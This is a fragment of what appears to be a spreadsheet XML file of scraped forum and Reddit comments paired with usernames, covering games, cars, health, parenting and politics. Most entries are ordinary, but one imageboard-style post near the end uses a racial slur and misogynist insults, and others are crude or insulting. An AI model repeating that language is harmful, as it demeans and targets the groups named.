    <t>Witchcraft</t>
  </si>
  <si>
    <t>perus12</t>
  </si>
  <si>
    <t>I'm on the edge if this was to scare/intentionally hit the scooter or to avoid a collision. Car's at fault, no doubt. 1. The van coming from behind seems to be moving to the left, maybe the car was about to move to mid lane, but pulled back after seeing the van? And knowing the scooter is there he had to straighten the wheels. 2. The scooter veers off to the left when it's getting passed by the car, maybe the car driver thought there was more space? But should the scooter even be there and why isn't the driver wearing a helmet?</t>
  </si>
  <si>
    <t>woofle07</t>
  </si>
  <si>
    <t>It’s this. *Every time* you pull up the menu, you get a new list of spells</t>
  </si>
  <si>
    <t>rythmryders</t>
  </si>
  <si>
    <t>Don’t do it because your trying to get something. Do it because it’s part of your life now. A hobby per say</t>
  </si>
  <si>
    <t>DancesCloseToTheFire</t>
  </si>
  <si>
    <t>Besides them being two groups with not as much overlap, anti-semites find the idea of Israel to be a useful one, since it helps establish that Jews are foreigners/outsiders who don't belong. Remember that displacement is easier than a straight-up purge.</t>
  </si>
  <si>
    <t>Cableguynoe</t>
  </si>
  <si>
    <t>flyntflossy10 said: i honestly still dont see how shuffling is criminal Click to expand... It took me 21 pages to figure out that the title of this thread should be "DC drivers are deplorable" Post automatically merged: Yesterday at 11:00 PM New2This said: And we're at 21 so @Cableguynoe can legally buy her a drink before boinking her Click to expand... This one ain't quite ready yet. Think I'm gonna wait til 25 before I make my move.</t>
  </si>
  <si>
    <t>Iron_brane</t>
  </si>
  <si>
    <t>Well ok then. We've done all we can here boys, pack it up. Let this man starve to death</t>
  </si>
  <si>
    <t>a_hawk_1323</t>
  </si>
  <si>
    <t>you should play the first 2 games because they are great.</t>
  </si>
  <si>
    <t>m3kster</t>
  </si>
  <si>
    <t>New doctor for sure</t>
  </si>
  <si>
    <t>prettymisspriya</t>
  </si>
  <si>
    <t>Doesn’t meet the requirements for a Wednesday post.</t>
  </si>
  <si>
    <t>biboombap</t>
  </si>
  <si>
    <t>Hangovers are primarily caused by a buildup of toxic acetaldehyde, an intermediate compound in the metabolism of alcohol. It is quite possible to have varying rates of enzyme activity leading to faster or slower processing of alcohol by the body; for instance, an inefficient version of acetaldehyde dehydrogenase is responsible for the Asian flush reaction. By that logic, it seems plausible that people could have a faster version of the enzyme as well. Also, numerous studies show that it's possible to slow the action of alcohol dehydrogenase, limiting the amount of alcohol being converted into toxic acetaldehyde and effectively preventing hangovers by giving the body time to "catch up" processing the bad stuff.</t>
  </si>
  <si>
    <t>sweetsmellingrosie</t>
  </si>
  <si>
    <t>That's it? Sorry geology guys this has been known and considered for a long time. Never worked to instill reason. There is nothing in geology that has ever satisfied a true life-long OI searcher. The searcher favors things, any thing, that might convince him to continue believing. I suspect that's true with many of the fans too. If the suggestion here is that the shafts have been flooding with infiltrating underground sea water some are late to the party. The flood tunnel "theory" happens to be an invention that never considered the science of anything. To me it's not even part of the OI mystery. It's part of the mystery of how people explain things that occur in a lot of places in ways that make it sound unique to their situation. Someone ask the geologist why there ever was a suggestion of well-spaced platforms, a 90 foot stone, a stone triangle pointer, a large stone cross...you know the stuff that doesn't appear everywhere like a swamp or a saltwater contaminated well. A geologist can explain to you everything that hasn't got to do with the mystery because it's part of the world we have classified with these classification "sciences". So yeah, talk to a geologist if you want to know about the ground. He's not going to be able to tell you where some of the non material "facts" come from. He's as hopeless as we all are in that regard.</t>
  </si>
  <si>
    <t>FormlessOne</t>
  </si>
  <si>
    <t>Why do you keep reading this utter horseshiat as though it's OK to take at face value?!</t>
  </si>
  <si>
    <t>BrokenGirl6488</t>
  </si>
  <si>
    <t>Yes, you are not alone, I too struggle and question myself. Nothing worse that being in a relationship and still experiencing loneliness,</t>
  </si>
  <si>
    <t>waldocalrissian</t>
  </si>
  <si>
    <t>Respect must be earned, but disrespect must also be earned. I'm going to act respectful as the default position because that is how I earn respect. But, if someone shows that they do not deserve my respect then I will stop being respectful. At that point I will stop caring if that person respects me or not.</t>
  </si>
  <si>
    <t>mrfriki</t>
  </si>
  <si>
    <t>The happy face looks more like a psycho face.</t>
  </si>
  <si>
    <t>BillyRayAtkins</t>
  </si>
  <si>
    <t>This is going to sound a bit weird but maybe take some drum lessons or dancing lessons. The things you say you're not good at rhythm and timing are more the focus there and you can develop that skillset which may translate to your violin playing.</t>
  </si>
  <si>
    <t>Everything_is_raysis</t>
  </si>
  <si>
    <t>My friends kid held me at gun point and i told him his Nerf gun was empty. I walked away.</t>
  </si>
  <si>
    <t>This board is just 3 schizos shitposting nonstop 24/7, and the occasional fig newton who comes here for a day and then leaves</t>
  </si>
  <si>
    <t>Rafaeliki</t>
  </si>
  <si>
    <t>If your friends are 14 and you are over 21 then the comparison might make sense.</t>
  </si>
  <si>
    <t>count_cruntula</t>
  </si>
  <si>
    <t>This guy has dived headfirst into the Mineshaft of cinema.</t>
  </si>
  <si>
    <t>EA_Darko</t>
  </si>
  <si>
    <t>Sorry to hear that you are having issues @rustysbro . Can you try the following steps please to see if they help: Disable all background programs on your system (including Steam). You can also do this with a clean boot Temporarily disconnect all other devices that you don't need from your network Use a wired connection Make sure Origin is accepted in your anti-virus and firewall Darko View in thread</t>
  </si>
  <si>
    <t>jec6613</t>
  </si>
  <si>
    <t>My only issue is having to work on a ladder for retrofit. :) The fan itself is anchored to the ceiling using load supporting brackets, you can see them in the electrical section of the hardware store. Besides having two sets of wires (one for lights the others for fans) it's no different than a standard ceiling light fixture.</t>
  </si>
  <si>
    <t>Thralls_Taco_Truck</t>
  </si>
  <si>
    <t>I dont know what you guys expected. Humans ride horses in a fantasy world. Why do you think playing horde is so fun? If I wanted to be a boring ass human I'd go outside</t>
  </si>
  <si>
    <t>Dhavaer</t>
  </si>
  <si>
    <t>Lots of things that aren't religions have those.</t>
  </si>
  <si>
    <t>1LoudST</t>
  </si>
  <si>
    <t>Well there is no name branding on the chair that the OP posted, so while I was searching for one on Amazon, the only non branded ones I could find were in fact the &lt;$100 ones. I've had mine for over 4 years without a single problem and as I like the feel of a snug fitting high bostlered racing seat (such as the Recaro's in my DD) I find it quite conformable. In fact it doesn't feel any different than a friend's DX-R. So I guess call it garbage if that's what makes you feel better but if the buyer likes it, then that is really all that matters</t>
  </si>
  <si>
    <t>GlitterGoth8904</t>
  </si>
  <si>
    <t>He was probably taken away from the mom too young, it’s sometimes like a comfort thing for them. What sweet beans</t>
  </si>
  <si>
    <t>Vwgci6</t>
  </si>
  <si>
    <t>Same goes for the hairline.</t>
  </si>
  <si>
    <t>NYWerebear</t>
  </si>
  <si>
    <t>If you haven't you really should. :) But then if he does, he may never work on his own game. So... uh. Yeah, never mind. :)</t>
  </si>
  <si>
    <t>EGarrick</t>
  </si>
  <si>
    <t>Thanks for the advice. Can they adapt to less sun? When I first bought them, it was from an outdoor nursery which kept them under a somewhat transparent tent. When I put them on our stoop in the sun, they were *not happy* with the situation so I had to move them inside.</t>
  </si>
  <si>
    <t>Gone_in_60_seconds</t>
  </si>
  <si>
    <t>RideshareDog said: I don't. Point 4 happened to me on Saturday. I dropped lyft decided it be best if they had me keep going back to the beaches. I passed the parked cop horse truck thing parked on Kingston road like 4x. And on Friday king street was the place to go apparently. I got taken there 3x. It was soo annoying. I don't want to be there wtf Click to expand... Any Prime Time or Bonuses on Saturday?</t>
  </si>
  <si>
    <t>TwatWaffleCat</t>
  </si>
  <si>
    <t>I miss Bear</t>
  </si>
  <si>
    <t>philpw99</t>
  </si>
  <si>
    <t>More bizarre about Echo's story was that the Queen killed the man who burned her house. Wait, didn't that man just carry out Queen's command? Why he was executed for burning a house, but not slaughtering Echo's father? Then Queen must have adopted many orphans like Ash and Echo, raising them as spies or assassins. So the Queen never order the orphans to fight each other? Only that day, before the real Echo was ready to go, the Queen suddenly wanted to test her. Echo should have been tested again and again way before that. You can't send a newbie spy out of a whiff, also Ash killed Echo didn't mean she could kill. She was defending herself only. Why the Queen think she was suddenly a killer?</t>
  </si>
  <si>
    <t>GottaKnowYourCKN</t>
  </si>
  <si>
    <t>People get audited and put out of house and home for this wall. We work out asses off so we can build this wall.</t>
  </si>
  <si>
    <t>sheepsheepers</t>
  </si>
  <si>
    <t>Totally. Caring for them helps me with anxiety, and seeing them grow is super rewarding!</t>
  </si>
  <si>
    <t>us3rn4meme</t>
  </si>
  <si>
    <t>Hi, My PC isn't working. I started it today and worked fine. I went away from it like 30 minutes, because a neighbor rang at my door. When I came back the screen was black and I thought it went into standby. I moved the mouse around to start it, pressed some keys but the display stayed black. I pressed the restart button and nothing happened. I switched it off from the smps and started it again from the power button. My screen says no input found. I removed the graphics card to check it out for any damage. It looks alright. The screen works. I plugged it to a laptop and it worked fine. I tried plugging the VGA cable directly to the motherboard, but still no signal. I searched on internet to see similar problems and I think that my smps might be the problem. I have lights on the motherboard, the fans are spinning, but my two case lights aren't on and I can't hear the beep anymore, when it starts. Does this mean that the smps doesn't give enough power to get the CPU running. Do I need to buy a new power source? Is it another problem then?</t>
  </si>
  <si>
    <t>Coldeb</t>
  </si>
  <si>
    <t>I bought The Canon 80D two weeks ago and I'm still getting to grips with it. It has a lot of features and manual modes that are a bit daunting and seem a bit complicated at the moment, however the Auto mode is terrific and the auto focus is amazing so I am using that for for now and I'll learn the rest as I go along. The kit lens is giving me very good sharp photos so a mid range lens should give outstanding pictures. Video is not really of interest to me, I already own a video camcorder anyway for that sort of thing, so I've not really tried the video feature yet. The 80D not light in weight, but it's not too heavy either , it's just enough to make it feel like a good solid well built camera, some of the cheaper camera's feel rather plastic and light weight, but not the 80D. I'm told it's splash and Rain proof but that said I don't think I'll be using it in bad weather. Summing up then: the 80D is a great mid range camera, terrific picture quality, easy to use with the auto feature and a good build structure.But I'll get to know it more in depth after I have owned it for much longer and learned how to use the other features more, but I'm very pleased with it so far.</t>
  </si>
  <si>
    <t>StainGlassLight</t>
  </si>
  <si>
    <t>Now I'm curious about what the bigger ball was originally</t>
  </si>
  <si>
    <t>beautymomma</t>
  </si>
  <si>
    <t>No on this board is the first time I’ve seen people do registries so early...I mean I guess with all the excitement they want to get it done! I guess it’s all a preference. With my first I did my registry 2 months before my babyshower and everyone I know has done it within a month or two before baby shower as well! I personally preferred it that way...by then I had already seen a few products that I knew for sure I wanted and had time to decide on which nursery styles I liked. There’s so many new things out for babies and it changes so often...</t>
  </si>
  <si>
    <t>Yabigknucklehead</t>
  </si>
  <si>
    <t>Not sure if this is a purely Australian problem, but went to my mums the other day and noticed the new soda stream bottles don't fit in her old machine. Here is a quick mod you can make if you have the same problem [machine after I took to it with the saw](https://imgur.com/kV3XMCs.jpg)</t>
  </si>
  <si>
    <t>Symnz</t>
  </si>
  <si>
    <t>You should probably lay off the drink for the rest of the night...</t>
  </si>
  <si>
    <t>perthbloke</t>
  </si>
  <si>
    <t>There is a utility called Instant Meshes that generates a pretty good quad mesh out of that jumble of triangles. Its free so try it. https://github.com/wjakob/instant-meshes Click the 'Clone or Download' button to get the zipped executable file.</t>
  </si>
  <si>
    <t>scow-yo</t>
  </si>
  <si>
    <t>To be most meme pages just repost memes most of the time so a lot of them don’t really deserve the money.it really sucks that the honest ones are getting hit tho.</t>
  </si>
  <si>
    <t>Justanaltaccount666</t>
  </si>
  <si>
    <t>It is the end of her in pvp though. All the memes have been about that. Yeah she’s a good auto unit but she’s straight up obsolete in pvp which is what I’m sure most of everyone has been referring to</t>
  </si>
  <si>
    <t>FreakyStarrbies</t>
  </si>
  <si>
    <t>This is the first that came to mind:. When I was in fifth grade, I was never good in sports or gym. I was tiny and weak, had a heart murmur...I just did the measure up. We were playing ["Steal the Bacon"](https://en.m.wikipedia.org/wiki/Steal_the_Bacon). A chalkboard eraser was the "bacon" The teacher called out a number, and two players were trying to take the eraser without being tagged. This went on too long, so the teacher called out another number, resulting in four players surrounding the "bacon". She called out another number...six players... Then the number 4, my number (How do I remember that?). Eight players, including myself were surrounding the bacon. I saw a gap. I crawled on the floor between some legs, grabbed the bacon and was back in my line before anyone knew what had happened! Nobody chased me! The teachers were cracking up, the kids were applauding and laughing (EVEN the opposing side!), and the rest of the players were still standing there looking around, trying to figure out what had happened. They said they looked down and it was gone! The teacher had to explain it to them. LOL! It was the first time I was ever happy to be small. It was the first time ... no, I think the ONLY time ... I ever felt like a winner in gym class, and it felt AWESOME!!</t>
  </si>
  <si>
    <t>EpicShiba1</t>
  </si>
  <si>
    <t>&gt;Where can i get that Aperture Science Handheld Quantum Tunneling Device?</t>
  </si>
  <si>
    <t>DietCOKAY</t>
  </si>
  <si>
    <t>How is she able to not work but maintain several animals that cost $250 a month? That's more than I spend on myself for food a month. The animals should be rehomed, and to save the $900 you could be using to evaluate your wifes farm property, have you considered moving MIL into the family home in the mean time? That way you can monitor the finances and set up a strict budget for her medical needs. It's possible she's using money as a crutch for her loneliness and grief. By bringing her in, you wife can better take are of her without needing to spend a lot of money, and your MIL will not be lonely. By saving the $900, you should talk with a lawyer about evaluating the property to see if it can be sold and start getting estimates for it. If repairing the home exceeds the amount it can be sold for, perhaps selling to a bank that can do so will allow you to recoup some of the costs being spent on MIL and may help you find a new and more affordable housing option for her.</t>
  </si>
  <si>
    <t>chandra381</t>
  </si>
  <si>
    <t>His real power is eating Parahumans (specifically the Corona Pollentia) and wearing their faces, memories, and powers. Everything else is just a bonus. The answer to your question is - instinctive knowledge</t>
  </si>
  <si>
    <t>cranfeckintastic</t>
  </si>
  <si>
    <t>I’m just sitting here like... I don’t care about it? It’s a spin-off for toddlers, big deal. All this anger is about as ridiculous as the TMNT fan base having angry baby tantrums over Rise of the TMNT series</t>
  </si>
  <si>
    <t>shewolfnyc80</t>
  </si>
  <si>
    <t>I play on the Galaxy S10+ and it doesn't get hot unless I have it plugged in for awhile while playing. (The battery just drains the second I start playing )</t>
  </si>
  <si>
    <t>Pineapplesmores</t>
  </si>
  <si>
    <t>I live in the alps and I’m meant to be going camping Friday night to watch them pass on Saturday and it’s rain predicted Friday and Saturday. The temperature is meant to drop to 19. So I don’t think heat is going to be the problem I think rain is. But maybe it’s just near me</t>
  </si>
  <si>
    <t>Haider.alix</t>
  </si>
  <si>
    <t># A quick reminder to those viewing this post: 1. If you have not done so, **read [the rules](https://www.reddit.com/r/progresspics/about/rules)** 2. Being a pervert will get you banned. 3. Messaging OP lewd/inappropriate comments is not okay. 4. OP is a real person. [Don't be an asshole](https://media.giphy.com/media/3oz8xt6aO8l4UjcnXa/giphy.gif). 5. **Report rule breaking comments.** *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/progresspics) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>dj-malachi</t>
  </si>
  <si>
    <t>I thought everyone has at least one computer they keep of the grid.</t>
  </si>
  <si>
    <t>Common</t>
  </si>
  <si>
    <t>I own a sig P320 and I love it, it appears alot of Police Depts are going to the P320 The Milwaukee Police Department has been the latest to adopt the increasingly popular Sig Sauer P320 handgun system. (Photo: Sig) Police in Wisconsins largest city moving forward will be using Sig Sauers modular P320 platform as their newest duty handgun. The Milwaukee Police Departments over 1,800 officers have been hanging up their current Smith &amp; Wesson M&amp;Ps in exchange for the new Sig. The move continues the P320s adoption by a number of law enforcement agencies from coast-to-coast, as well as the military who use the series as the M17 &amp; M18 Modular Handgun System. We chose the Sig Sauer P320 as the official duty firearm for the men and women of the Milwaukee Police Department based on the pistols superior performance, accuracy, and dependability throughout our rigorous testing process, said MPD Chief Alfonso Morales in a statement. The Chief stressed the ability to swap out the serialized trigger group across numerous grip sizes has been popular with the officers who are fielding the new gun. Due to its modular design, it can be configured in full-size, carry, compact and subcompact models in either 9mm, .357 Sig, .40 S&amp;W or .45 ACP. https://www.thegunpage.com/milwaukee...pistol/9281441</t>
  </si>
  <si>
    <t>Mk1Cbox</t>
  </si>
  <si>
    <t>POSITIVE COMMENT ABOUT HOW REPLY TO ORIGINAL COMMENT IS IN CORRECT FORMAT IMPLYING PROGRESS</t>
  </si>
  <si>
    <t>Moose_And_Squirrel</t>
  </si>
  <si>
    <t>&gt;Ah the old victory fap. Hold my bill, I'm going under.</t>
  </si>
  <si>
    <t>automongoose</t>
  </si>
  <si>
    <t>Be aware that you are not hurting Ivanka personally by "sticking it to her" and calling her a whore on Reddit. She's not reading these comments or crying over the fact that some guy heard from some guy that she had some sex 20 years ago. All you're doing is spreading the acceptability of calling *anyone and everyone* a whore as a way of denigrating them publicly. That's reflects on you, not her. If you had the chance to meet Ivanka in person, would you seriously take that opportunity to tell her to her face, "I heard on Reddit that you were loose in college and also you had a nose job...whore!!" Because that would make you a massive idiot, and no better than the idiots who wore t-shirts saying "Hillary sucks -- but not like Monica" in 2016. Is that really how you want to present yourself to the world? I am 100% all for criticizing Ivanka! There are a BILLION legitimate reasons to hate her and publicly condemn her. So why do you insist on spending your time focusing on her appearance and sex life, as if that affects ANYONE in the world besides Ivanka herself? And why do you think me making this a topic of discussion means that I'm putting it on the "same scale" as those legitimate criticisms? You're completely missing the point if you really think that's what I'm trying to do here. &gt;I am trying to keep priorities clear So am I. To me, the priority should be to condemn Ivanka's actual actions and the way she reflects poorly on the executive branch of the United States. Your priority is...what exactly? To be uncivil before being authentically critical? Cool, good for you....</t>
  </si>
  <si>
    <t>torturer-of-midgets</t>
  </si>
  <si>
    <t>When he pulled his dick out in class</t>
  </si>
  <si>
    <t>VikingoAnyday91</t>
  </si>
  <si>
    <t>It's the same weird bs in offline since the start</t>
  </si>
  <si>
    <t>NovaHotspike</t>
  </si>
  <si>
    <t>now try getting them to actually leave their parents basements</t>
  </si>
  <si>
    <t>Alpha463</t>
  </si>
  <si>
    <t>h . why ?</t>
  </si>
  <si>
    <t>blindsoupkitchen</t>
  </si>
  <si>
    <t>is this a reference to the chat screenshot you posted last night?</t>
  </si>
  <si>
    <t>meggrs13</t>
  </si>
  <si>
    <t>Yep. He was another one of those “untouchables” by the law because of the family he was born into. -cough cough-Thomas Ravenel-cough cough-</t>
  </si>
  <si>
    <t>stickytoffeesundae</t>
  </si>
  <si>
    <t>that’s what you get for being a prick to it</t>
  </si>
  <si>
    <t>HighasaCaite</t>
  </si>
  <si>
    <t>My understand from this is that there are no lecture slides at all yea? I had a course like this. I asked the lecturer if he could take a photo of the whiteboard once it was filled up before he rubbed everything off and post those as lecture notes. They seemed happy to agree. Alternatively maybe get to know someone in the lectures you do go to and ask if you can borrow their notes?</t>
  </si>
  <si>
    <t>stormaster</t>
  </si>
  <si>
    <t>And then it impregnates him and creates some Firefly/Human Hybrid monstrosity.</t>
  </si>
  <si>
    <t>Nonya</t>
  </si>
  <si>
    <t>Hi all, Has anyone completed their level 4 in business admin? I'm really struggling with Unit 44 Champion Customer Service - 1.6 Describe activities that give value to the service chain. I know what a service chain is and I know about value chain analysis, but is that what it wants from me? Or am I overthinking this and it literally just wants me to explain the day to day activities that support the whole process? Any thoughts would be appreciated! Thanks Nonz</t>
  </si>
  <si>
    <t>TonyKilledChico</t>
  </si>
  <si>
    <t>Saitama getting that life advice</t>
  </si>
  <si>
    <t>Typhillis</t>
  </si>
  <si>
    <t>Individual deaths dont Even matter that much right now. If you are few Kills behind and little cs you can be a very valuable asset to your Team. But so many People just dont care if their lane is behind and Start to int.</t>
  </si>
  <si>
    <t>saucyyyyyyyy</t>
  </si>
  <si>
    <t>Obviously I’m not going to give you that information as I’ve been embarrassed enough. This wasn’t an AMA for me to boast about how awesome it was. I was trying to show how it affected my life. Yes ultimately it was my decision I regret it. There’s many mean things I’d like to say about your character but I won’t because that’s not the way I am. Hope you find peace in whatever made you an asshole</t>
  </si>
  <si>
    <t>TheBlindCat</t>
  </si>
  <si>
    <t>Price compare. Most big box stores prices are MSRP which you should not pay. Local gun stores usually can do better. Online with a cheap transfer is probably best.</t>
  </si>
  <si>
    <t>homeopathetic</t>
  </si>
  <si>
    <t>It must be so painful to stand on the outside of society like you do, watching in, knowing you don't have the abilities to take part. I know the Qult makes you feel like you fit in, but man, seek help.</t>
  </si>
  <si>
    <t>zebsar</t>
  </si>
  <si>
    <t>Can I emigrate yet?</t>
  </si>
  <si>
    <t>bigmonmulgrew</t>
  </si>
  <si>
    <t>I like that idea but I think a crafting skill that increased as you craft would take a complete rework of the crrafting system. I liek it but I doubt they woudl even make minor tweaks these days</t>
  </si>
  <si>
    <t>skadoosh1117</t>
  </si>
  <si>
    <t>I've just been offered a job project managing some work around mergers &amp; acquisitions. I've never worked in M&amp;A before but I am really excited about this opportunity to learn something new. I'd like to use the next couple of weeks studying up on everything I can before I move into my new role. Where should I start? Any suggestions?</t>
  </si>
  <si>
    <t>NiteShad0ws</t>
  </si>
  <si>
    <t>big reason i was against 2-2-2, hurts the interole flex players</t>
  </si>
  <si>
    <t>jemkinsJemJemkins</t>
  </si>
  <si>
    <t>So have you only had the one blood test? If they’re worried about a potential ectopic, they should be monitoring the HCG every 2-3 days to see how they’re rising. for the scan, I believe they don’t expect to see anything until hcg is &gt;1000, but even then sometimes nothing is visible.</t>
  </si>
  <si>
    <t>Martin_DM</t>
  </si>
  <si>
    <t>[This Table](https://www.reddit.com/r/dndnext/comments/8hz339/5e_wealth_by_level_hoard_tables/?st=JKG8GW6O&amp;sh=4f8f75f3) is my work on average wealth by level, before you factor in expenses. It does *not* deal with magic items. There is a table in Xanathar’s Guide (page 151 iirc) that might halo with magic items. It’s reasonable to assume a level 5-10 PC would have 1 uncommon item (table F in the DMG) and a level 11-14 PC might have 2. A higher level PC might have a Rare item (table G) but maybe not.</t>
  </si>
  <si>
    <t>SuperiorOwoifier</t>
  </si>
  <si>
    <t>~OwO~ ***nuzzles you*** So I was cwasually pwaying Fwallout 3 when I hwear my ***nuzzle*** dwoorbell wing. I wasn't expecting any fwiends, so I wooked ***nuzzle*** out thwe window, and ~OwO~ ***nuzzle*** swaw a mwan stwanding ~OwO~ ***nuzzle*** at my dwoor, and I dwidn't wecognize hwim. ~OwO~ Swo, I went on over and ***nuzzle*** answered thwe dwoor."Hello ~OwO~ thwere" ***nuzzle*** I swaid nwonchalantly. ~OwO~ He ~OwO~ wesponded ***nuzzle*** with "Hwi, ~OwO~ I was wondering if you ***nuzzle*** hwad a fwew mwinutes to ***nuzzle*** hwear ***pulls out meat scepter*** thwe word of ~OwO~ Gwod?" So I swaid "Unfwortunately, nwo, nwot ***nuzzle*** wight ***nuzzle*** nwow. ~OwO~ I'M a bwit bwusy, ***nuzzle*** bwut if you gwive me ***nuzzle*** your address, I ~OwO~ cwan ***nuzzle*** swing by ***nuzzle*** water ~OwO~ twonight and I ***puts away meat scepter*** cwan twell you about Atheism." So he sways bwack "Wwell, ***nuzzle*** swir, ~OwO~ um... I dwon't want to ***nuzzle*** gwive my ***nuzzle*** pwersonal information out to wandom pweople..." ~OwO~ So my ~OwO~ wesponse is "Whwat? Why? ***nuzzle*** You dwon't want a wandom ~OwO~ stwanger knwocking on ~OwO~ your dwoor ***nuzzle*** in thwe ***nuzzle*** mwiddle of thwe ~OwO~ dway and trywing ***nuzzle*** to shwove thweir weligion ***nuzzle*** dwown your ***nuzzle*** thwoat? Kwinda hypwocritical, ~OwO~ ***nuzzle*** dwon't you thwink?" He jwust wooked cwompletely bwefuddled as he twurned ~OwO~ away and stwarted walking ***nuzzle*** dwown thwe stweet, off ~OwO~ ***pulls out meat scepter*** to hwis nwext ~OwO~ hwouse. As ~OwO~ he stwormed out, a cwouple of ~OwO~ ***nuzzle*** thwe pwasserbys stwarted ~OwO~ to whistle and chweer, swoon my nweighbors jwoined in and even ***nuzzle*** swome ~OwO~ dwivers. I gwave a wave and went off with a fweeling of ***nuzzle*** accomplishment. *I ~OwO~ ***nuzzle*** am a bwot, and ~OwO~ thwis action was pwerformed automatically. ***nuzzle*** Pwease [cwontact thwe mwoderators ~OwO~ of thwis ~OwO~ swubreddit](/message/compose/?to=/r/copypasta) if ***nuzzle*** you hwave any qwuestions or ***puts away meat scepter*** cwoncerns.* ___________________________ *ReverseText-Bot did nothing wrong*</t>
  </si>
  <si>
    <t>Aceswift007</t>
  </si>
  <si>
    <t>How much you bet they swam and gave up halfway through the bike portion?</t>
  </si>
  <si>
    <t>Westykins</t>
  </si>
  <si>
    <t>Is this it - The Strokes. Putting it on at work just gives me a pep to my step, and creates an aura of ‘maybe everything will be okay..’. Highly recommend :)</t>
  </si>
  <si>
    <t>KianNeon</t>
  </si>
  <si>
    <t>What did you get Another year older and deeper in debt Jerry buss don’t you call me because I can’t go I owe my soul to the purple and gold.</t>
  </si>
  <si>
    <t>Shaman_Bond</t>
  </si>
  <si>
    <t>Agreed completely on all accounts.</t>
  </si>
  <si>
    <t>Bobdreamz</t>
  </si>
  <si>
    <t>Trump is a "birther" so how did he not know that he was a racist from the start?</t>
  </si>
  <si>
    <t>ferociousblonde</t>
  </si>
  <si>
    <t>I read this book that changed my life. It’s called The Fifth Agreement by Jose Ruiz. It changed my whole perspective on my life. Where once I found misery and confusion, now I find inner peace and purpose in my life. I used to think everything was meaningless and now I realize everything has meaning. It has made such an impact on my life and actually sparked me into reading more books about self-discovery. I would highly recommend it to anyone who has trouble accessing therapy, or if you’re in a dark space.</t>
  </si>
  <si>
    <t>andelaccess</t>
  </si>
  <si>
    <t>there is always at least a couple of undeserving jurors but not on the level of sis and jess. last year we had sam/rockstar/scottie but at least two of those were trying to play</t>
  </si>
  <si>
    <t>scooter83</t>
  </si>
  <si>
    <t>Originally posted by mcexplorer: ↑ ISX 69.5 last chance to see sub70 prior to 4C? Expand ISX. Been watching here... not a ramp but a close over 66 would be a good confirmation of the recent downtrend being broken. ooks primed to knock out 70 imo.</t>
  </si>
  <si>
    <t>Blacklabelz9</t>
  </si>
  <si>
    <t>I called you pompous because nothing else can explain your bigotry. You literally think anyone who doesn’t agree with you is racist or deplorable. Only a child thinks that everyone must think like them otherwise they’re racist. Sitting here calling other democrats racist is once again why Trump won and will be re-elected. And you’re so visibly angry which means this simple truth struck deep. I really wish there weren’t so many hate filled people like you ruining the democrat party. It’s really saddening how one man destroyed your sanity so easily. I pity you.</t>
  </si>
  <si>
    <t>intlnews</t>
  </si>
  <si>
    <t>I would hope so. For now there is just a movement to remove the reactionary government</t>
  </si>
  <si>
    <t>NorthOE</t>
  </si>
  <si>
    <t>Am I crazy to think that Ineos is not in such a hurry to attack? I mean getting the yellow in Paris is beter, but current leader is a clasic rider that has been competing since January and won the TT like nothing. Bernal or Thomas could Pereiro this tour</t>
  </si>
  <si>
    <t>XenoVisthra</t>
  </si>
  <si>
    <t>Yeah I don’t have one of my own but I know a few places that I could print something. I’ve been itching for a 3D printer but know it’ll just add to my already bad D&amp;D addiction. Haha.</t>
  </si>
  <si>
    <t>Triigma</t>
  </si>
  <si>
    <t>Cool</t>
  </si>
  <si>
    <t>Big Klu</t>
  </si>
  <si>
    <t>Originally Posted by Ironman92 Phillies, Reds, Nationals...,only 3 NL teams batting the pitcher 8th today I'm almost to the point of welcoming the DH to the NL just to end this foolishness -- almost. Either that, or take the next step and bat the pitcher 7th.</t>
  </si>
  <si>
    <t>*172,915,326,628,650 MemeCoins invested @ 0 upvotes* Your investment is active. I'll evaluate your return in 4 hours and update this comment. Stay tuned! Your current balance is **0 MemeCoins**.</t>
  </si>
  <si>
    <t>theorias_</t>
  </si>
  <si>
    <t>I know what they said, but I think they might have meant allowing more than 8 characters for town names.</t>
  </si>
  <si>
    <t>RdJNL</t>
  </si>
  <si>
    <t>What would it look like without the even stages?</t>
  </si>
  <si>
    <t>Sales Assistant</t>
  </si>
  <si>
    <t>10 years Pros Fast paced and fun. Lots of great people Cons Too many layoffs and changing mgmt every year Keep the people that gave their all to this company</t>
  </si>
  <si>
    <t>bettstg</t>
  </si>
  <si>
    <t>I used the Fast eddie with the double pin, perfect for Midwest whitetail hunting, site the top for 20 and the second pin is 35</t>
  </si>
  <si>
    <t>Titan_Arum</t>
  </si>
  <si>
    <t>Same response for me. I've replayed it so many times now...</t>
  </si>
  <si>
    <t>krankie</t>
  </si>
  <si>
    <t>By hand = food particle remover. Dishwasher = dish deodorizer and sanitizer. And jetdry finish = dish conditioner. It's a 2-step process. You get rid of all the food and grease before you put it in the dishwasher. You don't want your dishes being slapped with spaghetti noodles, do ya???</t>
  </si>
  <si>
    <t>CreateUserName</t>
  </si>
  <si>
    <t>My lo has a lip tie and I'm still on the fence about getting her's fixed. We struggle(thrush,poor latch, painful nipples, ) but I'm getting through it. We introduced baby food recently ,instead of the doctor's recommended rice cereal (due to reflux)so I'll see how that goes.</t>
  </si>
  <si>
    <t>I_am_a_God_to_ants</t>
  </si>
  <si>
    <t>And this has been done intentionally.</t>
  </si>
  <si>
    <t>TheRealBillNye_</t>
  </si>
  <si>
    <t>I love the whole story but the major changes in part 3 I just can’t see happening.</t>
  </si>
  <si>
    <t>dcgirl17</t>
  </si>
  <si>
    <t>It’s tacky and ugly now, and it’s gonna look real dated in about five years. If I never see another video of resin/wood again, I swear. Who buys these ugly gimmicky things?</t>
  </si>
  <si>
    <t>Pazuzu</t>
  </si>
  <si>
    <t>No chance. He faked it.</t>
  </si>
  <si>
    <t>tbauh</t>
  </si>
  <si>
    <t>That is also a spread of terrorist propaganda. “It’s the victim’s fault”.</t>
  </si>
  <si>
    <t>turningsteel</t>
  </si>
  <si>
    <t>My mind went to the same place. Somehow I feel that the girl would justify it by thinking, "Well this is what I have to do to own a yacht and be fabulously wealthy. Better than being one of the poors." *wipes shit off her eyebrows*</t>
  </si>
  <si>
    <t>Al-Andalusia</t>
  </si>
  <si>
    <t>♪ And we're stayin' alive, stayin' alive ♪</t>
  </si>
  <si>
    <t>&gt;&gt;220964403 I have blue eyes so I know pretty well. It is a social construct and social classification system based on phenotypical features and cultural adherence. Blonde hair and blue eyes gain you eligibility to the white race but not automatic inclusion. At least not in the olden days it didn't. You also had to act white. Maybe we should start doing that again with the white roastie whores that act like niggers.</t>
  </si>
  <si>
    <t>AquaticMagma</t>
  </si>
  <si>
